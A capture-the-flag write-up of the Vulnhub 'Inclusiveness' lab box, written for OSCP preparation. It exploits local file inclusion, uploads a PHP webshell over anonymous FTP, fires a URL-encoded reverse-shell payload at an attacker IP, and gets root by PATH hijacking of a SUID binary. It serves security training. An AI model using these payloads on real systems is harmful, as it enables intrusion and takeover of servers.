PG Play/Vulnhub | INCLUSIVENESS — WriteUp

Box 2/40

My second writeup for OSCP preparation.

RECONNAISSANCE

It is also called Information Gathering Phase. To gather as much information as possible about the target.

I’ll start off by running an nmap scan: nmap -p- -sS -Pn -n -T4 --min-rate=3000 $RHOST. Nmap discovered the following open ports and services:

nmap -p- -sS -Pn -n -T4 --min-rate=3000 192.168.128.14 

Run a comprehensive nmap scan to gather more detailed information about the open ports. It is valuable for an attacker as it provides detailed information on a potential attack vectors into a system.

nmap -p21,22,80 -sC -sV -O -Pn -n 192.168.128.14

ENUMERATION

It is defined as the process of extracting user names, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target.

PORT 21 — FTP

A vsFTPd 3.0.3 server on port 21 with anonymous access enabled and no interesting or useful file in here. There is no known public vulnerability for this version.

PORT 22 — SSH

Need a valid credentials to connect here.

POR80 — HTTP

Browse to http://192.168.128.14 shows that is an Apache2 Debian Default Page.

Check robots.txt if available, and as shown below that I can’t read robots.txt.

To bypass this restriction, create a custom user agent for the search engine. I used curl to create a user agent and read the robots.txt. As shown below I’m now able to read the disallowed entry as “/secret_informtion/”.

Browse to http://192.168.128.14/secret_information, it brings a web page that describes “DNS Zone Transfer Attack” and the web page contains two hyperlinks “English & Spanish.” As I click one of the hyperlinks, it shows that a parameter lang is used by the web page to locate the resource named en.php on the file system. The parameter is possibly vulnerable to File inclusion vulnerability.

EXPLOITATION

This is where an attacker/pentester breaks or gain access to the system.

File Inclusion Vulnerability are divided into Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI and RFI are vulnerabilities that are often found in poorly-written web applications. These vulnerabilities occur when a web application allows the user to submit input into files or upload files to the server.

Local File Inclusion (LFI) vulnerabilities allow an attacker to read and sometimes execute local files on the web server (including log files and configuration files containing password hashes or even clear text passwords). The parameter lang is vulnerable to LFI by entering any valid local file-to-path that abuses the PHP include. I try to get /etc/passwd file by abusing the PHP include of the webpage and as result, I got the whole contents of the /etc/passwd file as shown in the below image.

Remote File Inclusion (RFI) vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker can include files from a remote location. Let’s see if I can include a remote file too on the web page by entering an external URL in the lang parameter.
Host a simple HTTP server and in the lang parameter I tried to browse to my HTTP server, nothing happens it is not vulnerable to RFI.

Since I can access FTP using anonymous login, let’s check if I can read the content of vsftpd config file.

As shown in the config file that the directory of vsftpd is /var/ftp and its write permission is also enabled. I create a malicious PHP webshell.

<?php system($_REQUEST['cmd']) ?>

Upload the PHP file in the FTP pub directory.

ftp 192.168.128.14
cd pub
put php-cmd.php

Try if the PHP payload is working. As shown below that I can execute command using the payload.

To gain a remote connection first I will generate a listener.

nc nvlp 80

URL Encode the one liner PHP reverse shell payload.

php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

Execute PHP revershell payload.

192.168.128.14/secret_information/?lang=../../../../var/ftp/pub/php-cmd.php&cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

Once the exploit is successfully executed, I will receive a reverse shell connection from port 80 as www-data.

PRIVILEGE ESCALATION

It is the process of increasing the level of user privileges on a certain host to the highest permission level.

Upon checking the/home/tom directory, I found an interesting file rootshell.c file and a compile file rootshell that owns SUID permissions.

According to the code, it will execute the whoami file and check if the current user is tom. If the current user is tom it will escalate the privilege into the highest privilege or else it will only print username-id of the current user.

Create a whoami file in /tmp directory abd make it executrable.

echo "printf "tom"" > whoami
chmod +x whoami

Changing the target system path /tmp directory, and check if it is changed.

export PATH=/tmp:$PATH
echo $PATH

Execute the rootshell

cd /home/tom
./rootshell

Once the file is successfully executed, I will obtain a root privilege shell.

Student